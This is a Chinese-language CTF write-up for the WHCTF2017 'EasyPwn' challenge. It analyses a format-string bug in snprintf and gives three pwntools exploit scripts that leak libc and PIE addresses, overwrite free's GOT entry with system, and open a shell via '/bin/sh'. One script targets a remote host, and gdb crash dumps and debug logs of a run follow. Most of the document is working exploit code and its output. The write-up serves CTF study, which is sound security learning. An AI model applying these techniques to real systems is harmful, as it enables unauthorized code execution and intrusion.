解题思路
基本信息查询
healer@healer:~/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn$ readelf -h pwn1
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: DYN (Shared object file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0xa00
Start of program headers: 64 (bytes into file)
Start of section headers: 8640 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 9
Size of section headers: 64 (bytes)
Number of section headers: 29
Section header string table index: 28
healer@healer:~/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn$ checksec pwn1
[*] '/home/healer/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn/pwn1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
漏洞分析
通过初步的分析发现下面的函数存在漏洞在执行snprintf()函数的时候有格式化字符串漏洞,因为观察栈空间可以发现有重叠的部分,利用这个重叠制造格式化漏洞利用
并且通过劫持free函数的got表信息,使其指向system函数,最后使用程序的正常执行流程,输入“/bin/sh”执行另一个功能即可执行system("/bin/sh")
__int64 sub_B30()
{
char s; // [sp+10h] [bp-BF0h]@1
char v2; // [sp+410h] [bp-7F0h]@1
__int64 v3; // [sp+7F8h] [bp-408h]@1
__int64 v4; // [sp+BF8h] [bp-8h]@1
v4 = *MK_FP(__FS__, 40LL);
memset(&s, 0, 0x400uLL);
memset(&v3, 0, 8uLL);
memset(&v2, 0, 0x7E8uLL);
LOWORD(v3) = 29477;
BYTE2(v3) = 0;
puts("Welcome To WHCTF2017:");
read(0, &s, 0x438uLL);
snprintf(&v2, 0x7D0uLL, (const char *)&v3, &s);
printf("Your Input Is :%s\n", &v2);
return *MK_FP(__FS__, 40LL) ^ v4;
}
漏洞利用脚本
此题的一些思考
这个题做的时候因为已经触发过free()函数,所以free函数的got表值已经写入了,并且和system函数的只相差最后三个字节,修改时可以逐个字节修改,也可以逐字修改,只不过逐字修改多一点,也可以第一次一个字,第二次一个字节,或者直接一次性修改四个字节,但是这个没有尝试成功
这个题因为开了动态地址随机化,所以每一次加载的位置都不一样并且获得的system函数的值也不一样,所以构造的格式化字符串的详细数值(控制写入的字符个数值)也是不一样的,指定的位置(指向目标地址的指针)在栈中的偏移是可以确定的,所以构造的格式化字符串要动态生成。并且要首先泄露进程的加载地址,以及函数的加载地址,需要通过前期泄露出来。
可能脚本中的方法略显笨拙,大佬勿喷,汗!!!
逐字节修改方法
from pwn import *
# from LibcSearcher import *
context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']
io = remote("111.200.241.244",48509)
# io = process("./pwn1")
libc = ELF("./libc.so.6")
# libc = ELF("./libc-2.23.so")
elf = ELF("./pwn1")
context(arch = "amd64", os = 'linux')
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# gdb.attach(io,"b * 0x555555554c05")
payload = b"a"*0x3e8 + b"bb%397$p"
io.sendline(payload)
io.recvuntil("0x")
libc_start_main = io.recv(12)
libc_start_main = int(b"0x"+libc_start_main,16) - 240
log.info("libc_start_main: "+hex(libc_start_main))
libc_start_main_libc = libc.symbols["__libc_start_main"]
log.info("libc_start_main_libc: "+hex(libc_start_main_libc))
system_addr = libc.symbols["system"]
log.info("system_addr: "+hex(system_addr))
offset = libc_start_main_libc - system_addr
# 24C50
system_real_addr = libc_start_main - offset
log.info("system_real_addr: "+hex(system_real_addr))
# libc_searcher = LibcSearcher("__libc_start_main",libc_start_main)
# libc_base = libc_start_main - libc_searcher.dump("__libc_start_main")
# system = libc_base + libc_searcher.dump("system")
# system_real_addr = system
# log.info("system_real_addr: "+hex(system_real_addr))
io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("healer")
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%396$p"
io.sendline(payload)
io.recvuntil("0x")
init_real_addr = io.recv(12)
init_real_addr = int(b"0x"+init_real_addr,16)
log.info("init_real_addr: "+hex(init_real_addr))
elf_base = 0xFFFFFFFFFFFFF000 & init_real_addr
free_got_addr = elf_base + 0x202018
log.info("free_got_addr: "+hex(free_got_addr))
# [*] system_real_addr: 0x7fc35da95fa0
# [*] system_real_addr: 0x7fef74ad8fa0
one_byte = 0x00000000000000FF & system_real_addr
two_byte = (0x000000000000FF00 & system_real_addr) >> 8
three_byte = (0x00000000FF0000 & system_real_addr) >> 16
one_offset = one_byte + 2
two_offset = two_byte + 2
three_offset = three_byte + 2
pattern_payload = (b"bb%" + str(one_offset).encode() + b"c%133$hhn").ljust(16,b"A")
# print(pattern_payload)
# print(one_offset,two_offset,three_offset)
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# payload = b"a"*0x3e8 + b"bb%135$p%136$p%137$p%138$p%139$p%140$p%141$p%142$p%143$p%144$p%145$p%146$p"
# payload = b"a"*0x3e0 + p64(free_got_addr) + b"bb%4154793912c%130$n"
payload = b"a"*0x3e8 + (b"bb%" + str(one_offset).encode() + b"c%133$hhn").ljust(16,b"A") + p64(free_got_addr)
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
io.sendline(payload)
# 0x00007ffff7a91540 -> 0x7ffff7a523a0
# bb%8118c%135$hn%5c%136$hhnAAAAAA
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
# 83:0418│ 0x7fffffffd568 —▸ 0x555555756018 —▸ 0x7ffff7a91540 (free) ◂— push r13
# 84:0420│ 0x7fffffffd570 —▸ 0x55555575601a ◂— 0xc6a000007ffff7a9
# 0x7ffff7a59f59 <printf_positional+8697> mov word ptr [rax], r15w
# 0x7ffff7a590f7 <printf_positional+5015> mov byte ptr [rax], r15b
# 0x7ffff7a59bd6 <printf_positional+7798> mov dword ptr [rax], r15d
# 0x7fffffffbfe0 ◂— 0x60186e6868243233
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + (b"bb%" + str(two_offset).encode() + b"c%133$hhn").ljust(16,b"A") + p64(free_got_addr+1)
io.sendline(payload)
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + (b"bb%" + str(three_offset).encode() + b"c%133$hhn").ljust(16,b"A") + p64(free_got_addr+2)
io.sendline(payload)
io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("/bin/sh")
io.interactive()
一字加一字节方法写入脚本
此脚本用在本地关了地址随机化时的测试,本地调试成功的,方法都是一样的,再加上地址随机化的处理即可作为有效的exp
from pwn import *
context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']
# io = remote("220.249.52.134",59762)
io = process("./pwn1")
libc = ELF("./libc.so.6")
elf = ELF("./pwn1")
context(arch = "amd64", os = 'linux')
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
gdb.attach(io,"b * 0x555555554c05")
payload = b"a"*0x3e8 + b"bb%397$p"
io.sendline(payload)
io.recvuntil("0x")
libc_start_main = io.recv(12)
libc_start_main = int(b"0x"+libc_start_main,16) - 240
log.info("libc_start_main: "+hex(libc_start_main))
libc_start_main_libc = libc.symbols["__libc_start_main"]
log.info("libc_start_main_libc: "+hex(libc_start_main_libc))
system_addr = libc.symbols["system"]
log.info("system_addr: "+hex(system_addr))
offset = libc_start_main_libc - system_addr
# 24C50
system_real_addr = libc_start_main - offset
log.info("system_real_addr: "+hex(system_real_addr))
io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("healer")
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%396$p"
io.sendline(payload)
io.recvuntil("0x")
init_real_addr = io.recv(12)
init_real_addr = int(b"0x"+init_real_addr,16)
log.info("init_real_addr: "+hex(init_real_addr))
elf_base = 0xFFFFFFFFFFFFF000 & init_real_addr
free_got_addr = elf_base + 0x202018
log.info("free_got_addr: "+hex(free_got_addr))
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# payload = b"a"*0x3e8 + b"bb%135$p%136$p%137$p%138$p%139$p%140$p%141$p%142$p%143$p%144$p%145$p%146$p"
# payload = b"a"*0x3e0 + p64(free_got_addr) + b"bb%4154793912c%130$n"
payload = b"a"*0x3e8 + b"bb%8098c%133$hnA" + p64(free_got_addr)
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
io.sendline(payload)
# 0x00007ffff7a91540 -> 0x7ffff7a523a0
# bb%8118c%135$hn%5c%136$hhnAAAAAA
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
# 83:0418│ 0x7fffffffd568 —▸ 0x555555756018 —▸ 0x7ffff7a91540 (free) ◂— push r13
# 84:0420│ 0x7fffffffd570 —▸ 0x55555575601a ◂— 0xc6a000007ffff7a9
# 0x7ffff7a59f59 <printf_positional+8697> mov word ptr [rax], r15w
# 0x7ffff7a590f7 <printf_positional+5015> mov byte ptr [rax], r15b
# 0x7ffff7a59bd6 <printf_positional+7798> mov dword ptr [rax], r15d
# 0x7fffffffbfe0 ◂— 0x60186e6868243233
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%167c%133$hhnA" + p64(free_got_addr+2)
io.sendline(payload)
io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("/bin/sh")
io.interactive()
直接写入双字脚本
这个方法没有尝试成功,具体写入目标地址的时候发生下面内容中的错误,不想再细看了,先放着吧,估计是一次写的太大了,此方法未尝试成功
from pwn import *
context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']
# io = remote("220.249.52.134",59762)
io = process("./pwn1")
libc = ELF("./libc.so.6")
elf = ELF("./pwn1")
context(arch = "amd64", os = 'linux')
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
gdb.attach(io,"b * 0x555555554c05")
payload = b"a"*0x3e8 + b"bb%397$p"
io.sendline(payload)
io.recvuntil("0x")
libc_start_main = io.recv(12)
libc_start_main = int(b"0x"+libc_start_main,16) - 240
log.info("libc_start_main: "+hex(libc_start_main))
libc_start_main_libc = libc.symbols["__libc_start_main"]
log.info("libc_start_main_libc: "+hex(libc_start_main_libc))
system_addr = libc.symbols["system"]
log.info("system_addr: "+hex(system_addr))
offset = libc_start_main_libc - system_addr
# 24C50
system_real_addr = libc_start_main - offset
log.info("system_real_addr: "+hex(system_real_addr))
io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("healer")
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%396$p"
io.sendline(payload)
io.recvuntil("0x")
init_real_addr = io.recv(12)
init_real_addr = int(b"0x"+init_real_addr,16)
log.info("init_real_addr: "+hex(init_real_addr))
elf_base = 0xFFFFFFFFFFFFF000 & init_real_addr
free_got_addr = elf_base + 0x202018
log.info("free_got_addr: "+hex(free_got_addr))
io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# payload = b"a"*0x3e8 + b"bb%135$p%136$p%137$p%138$p%139$p%140$p%141$p%142$p%143$p%144$p%145$p%146$p"
# payload = b"a"*0x3e0 + p64(free_got_addr) + b"bb%4154793912c%130$n"
payload = b"a"*0x3e8 + b"bb%128263072c%134$nAAAA" + p64(free_got_addr)
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
io.sendline(payload)
# 0x00007ffff7a91540 -> 0x7ffff7a523a0
# bb%8118c%135$hn%5c%136$hhnAAAAAA
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
# 83:0418│ 0x7fffffffd568 —▸ 0x555555756018 —▸ 0x7ffff7a91540 (free) ◂— push r13
# 84:0420│ 0x7fffffffd570 —▸ 0x55555575601a ◂— 0xc6a000007ffff7a9
# 0x7ffff7a59f59 <printf_positional+8697> mov word ptr [rax], r15w
# 0x7ffff7a590f7 <printf_positional+5015> mov byte ptr [rax], r15b
# 0x7ffff7a59bd6 <printf_positional+7798> mov dword ptr [rax], r15d
# 0x7fffffffbfe0 ◂— 0x60186e6868243233
io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("/bin/sh")
io.interactive()
'''
pwndbg> watch * 0x555555756018
Hardware watchpoint 2: * 0x555555756018
pwndbg> c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7a59bd6 in printf_positional (s=s@entry=0x7fffffffcf10, format=format@entry=0x7fffffffd948 "bb%128263072c%134$nAAAA\030", ' ' <repeats 176 times>..., readonly_format=readonly_format@entry=0, ap=ap@entry=0x7fffffffd078, ap_savep=ap_savep@entry=0x7fffffffcaa8, done=128264096, nspecs_done=2, lead_str_end=0x7fffffffd948 "bb%128263072c%134$nAAAA\030", ' ' <repeats 176 times>..., work_buffer=0x7fffffffcae0 "x\320\377\377\377\177", save_errno=0, grouping=0x0, thousands_sep=0x7ffff7b99be5 "") at vfprintf.c:2022
2022 vfprintf.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
*RAX 0x6161616161616161 ('aaaaaaaa')
*RBX 0x7fffffffb780 ◂— 0xffffd160
*RCX 0x0
*RDX 0x17
*RDI 0x7ffff7a58bd0 (printf_positional+3696) ◂— mov rsi, qword ptr [r14 + 0x38]
*RSI 0x20
*R8 0x0
*R9 0x6e
*R10 0x6e
*R11 0x0
*R12 0x0
*R13 0x7fffffffcf10 ◂— 0xfbad8001
*R14 0x7fffffffc5b0 ◂— 0xffffffff
*R15 0x7a527a0
*RBP 0x7fffffffc950 —▸ 0x7fffffffcf00 —▸ 0x7fffffffd560 ◂— 0x6161616161616161 ('aaaaaaaa')
*RSP 0x7fffffffb780 ◂— 0xffffd160
*RIP 0x7ffff7a59bd6 (printf_positional+7798) ◂— mov dword ptr [rax], r15d
────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────
► 0x7ffff7a59bd6 <printf_positional+7798> mov dword ptr [rax], r15d
0x7ffff7a59bd9 <printf_positional+7801> jmp printf_positional+1666 <printf_positional+1666>
↓
0x7ffff7a583e2 <printf_positional+1666> mov rax, qword ptr [rbp - 0x478]
0x7ffff7a583e9 <printf_positional+1673> test rax, rax
0x7ffff7a583ec <printf_positional+1676> je printf_positional+1686 <printf_positional+1686>
↓
0x7ffff7a583f6 <printf_positional+1686> test r15d, r15d
0x7ffff7a583f9 <printf_positional+1689> js printf_positional+9059 <printf_positional+9059>
↓
0x7ffff7a5a0c3 <printf_positional+9059> lea rcx, [rip + 0x146816] <0x7ffff7ba08e0>
0x7ffff7a5a0ca <printf_positional+9066> lea rsi, [rip + 0x13fdcb]
0x7ffff7a5a0d1 <printf_positional+9073> lea rdi, [rip + 0x143740]
0x7ffff7a5a0d8 <printf_positional+9080> mov edx, 0x80e
─────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────
00:0000│ rbx rsp 0x7fffffffb780 ◂— 0xffffd160
01:0008│ 0x7fffffffb788 ◂— 0x0
02:0010│ 0x7fffffffb790 —▸ 0x7ffff7fde700 ◂— 0x7ffff7fde700
03:0018│ 0x7fffffffb798 ◂— 0x0
04:0020│ 0x7fffffffb7a0 ◂— 0x555599999999
05:0028│ 0x7fffffffb7a8 ◂— 0x0
... ↓
───────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────
► f 0 7ffff7a59bd6 printf_positional+7798
f 1 7ffff7a5a4b6 vfprintf+822
f 2 7ffff7a83a59 vsnprintf+121
f 3 7ffff7a62942 snprintf+130
f 4 555555554c0a
f 5 555555554cf9
f 6 7ffff7a2d840 __libc_start_main+240
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
'''
脚本执行结果
healer@healer-virtual-machine:~/Desktop/EasyPwn$ python3 exp.py
[+] Opening connection to 111.200.241.244 on port 48509: Done
[DEBUG] PLT 0x1f7f0 realloc
[DEBUG] PLT 0x1f800 __tls_get_addr
[DEBUG] PLT 0x1f820 memalign
[DEBUG] PLT 0x1f850 _dl_find_dso_for_object
[DEBUG] PLT 0x1f870 calloc
[DEBUG] PLT 0x1f8a0 malloc
[DEBUG] PLT 0x1f8a8 free
[*] '/home/healer/Desktop/EasyPwn/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[DEBUG] PLT 0x920 free
[DEBUG] PLT 0x930 puts
[DEBUG] PLT 0x940 write
[DEBUG] PLT 0x950 __stack_chk_fail
[DEBUG] PLT 0x960 printf
[DEBUG] PLT 0x970 snprintf
[DEBUG] PLT 0x980 memset
[DEBUG] PLT 0x990 read
[DEBUG] PLT 0x9a0 __libc_start_main
[DEBUG] PLT 0x9b0 malloc
[DEBUG] PLT 0x9c0 setvbuf
[DEBUG] PLT 0x9d0 atoi
[DEBUG] PLT 0x9e0 __isoc99_scanf
[DEBUG] PLT 0x9f0 __gmon_start__
[DEBUG] PLT 0x9f8 __cxa_finalize
[*] '/home/healer/Desktop/EasyPwn/pwn1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[DEBUG] Received 0x11 bytes:
b'Input Your Code:\n'
[DEBUG] Sent 0x2 bytes:
b'1\n'
[DEBUG] Received 0x15 bytes:
b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x3f1 bytes:
b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%397$p\n'
[DEBUG] Received 0x1 bytes:
b'\n'
[DEBUG] Received 0x421 bytes:
b'Your Input Is :aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%397$p\n'
b'0x7fbf673df830\n'
b'\n'
b'Input Your Code:\n'
[*] libc_start_main: 0x7fbf673df740
[*] libc_start_main_libc: 0x20740
[*] system_addr: 0x45390
[*] system_real_addr: 0x7fbf67404390
[DEBUG] Sent 0x2 bytes:
b'2\n'
[DEBUG] Received 0x11 bytes:
b'Input Your Name:\n'
[DEBUG] Sent 0x7 bytes:
b'healer\n'
[DEBUG] Received 0x20 bytes:
b'OK!I Know Your Name :healer\n'
b'Now!'
[DEBUG] Received 0x11 bytes:
b'Input Your Code:\n'
[DEBUG] Sent 0x2 bytes:
b'1\n'
[DEBUG] Received 0x15 bytes:
b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x3f1 bytes:
b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%396$p\n'
[DEBUG] Received 0x1 bytes:
b'\n'
[DEBUG] Received 0x421 bytes:
b'Your Input Is :aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%396$p\n'
b'0x55e0a5c1ada0\n'
b'\n'
b'Input Your Code:\n'
[*] init_real_addr: 0x55e0a5c1ada0
[*] free_got_addr: 0x55e0a5e1c018
b'bb%146c%133$hhnA'
146 69 66
[DEBUG] Sent 0x2 bytes:
b'1\n'
[DEBUG] Received 0x15 bytes:
b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
000003e0 61 61 61 61 61 61 61 61 62 62 25 31 34 36 63 25 │aaaa│aaaa│bb%1│46c%│
000003f0 31 33 33 24 68 68 6e 41 18 c0 e1 a5 e0 55 00 00 │133$│hhnA│····│·U··│
00000400 0a │·│
00000401
[DEBUG] Received 0x1 bytes:
b'\n'
[DEBUG] Received 0x4a4 bytes:
00000000 59 6f 75 72 20 49 6e 70 75 74 20 49 73 20 3a 61 │Your│ Inp│ut I│s :a│
00000010 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
000003f0 61 61 61 61 61 61 61 62 62 25 31 34 36 63 25 31 │aaaa│aaab│b%14│6c%1│
00000400 33 33 24 68 68 6e 41 18 c0 e1 a5 e0 55 20 20 20 │33$h│hnA·│····│U │
00000410 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │ │ │ │ │
*
00000490 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 49 │ │ │ │ ·I│
000004a0 6e 70 75 74 │nput│
000004a4
[DEBUG] Received 0xc bytes:
b' Your Code:\n'
[DEBUG] Sent 0x2 bytes:
b'1\n'
[DEBUG] Received 0x15 bytes:
b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
000003e0 61 61 61 61 61 61 61 61 62 62 25 36 39 63 25 31 │aaaa│aaaa│bb%6│9c%1│
000003f0 33 33 24 68 68 6e 41 41 19 c0 e1 a5 e0 55 00 00 │33$h│hnAA│····│·U··│
00000400 0a │·│
00000401
[DEBUG] Received 0x1 bytes:
b'\n'
[DEBUG] Received 0x463 bytes:
